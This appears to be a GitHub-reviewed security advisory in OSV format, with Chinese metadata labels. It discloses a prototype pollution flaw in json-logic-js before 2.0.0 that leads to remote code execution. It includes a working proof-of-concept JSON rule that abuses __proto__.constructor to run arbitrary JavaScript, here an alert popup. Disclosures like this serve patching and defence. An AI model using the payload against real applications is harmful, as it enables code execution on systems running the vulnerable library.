OSV 1.4.0 · github-reviewed · 修改于 2020-11-13 03:35
发布时间
2020-11-13 03:36
GitHub 审查时间
2020-11-13 03:35
NVD 发布时间
—
源文件
advisories/github-reviewed/2020/11/GHSA-m9hw-7xfv-wqg7/GHSA-m9hw-7xfv-wqg7.json
Versions of json-logic-js prior to 2.0.0 are vulnerable to Prototype Pollution. The method operation allows a malicious user to modify the prototype of Object through the method property name. This causes modification of any existing property that will exist on all objects and leads to Remote Code Execution.
The following rule creates a popup when run from a browser:
{
"method": [
{
"method": [
{
"var": "__proto__.constructor.is.__proto__"
},
"constructor",
[
"var x = 'SECURITY!'; console.log(x, window.fetch); alert(x)"
]
]
},
"call"
]
}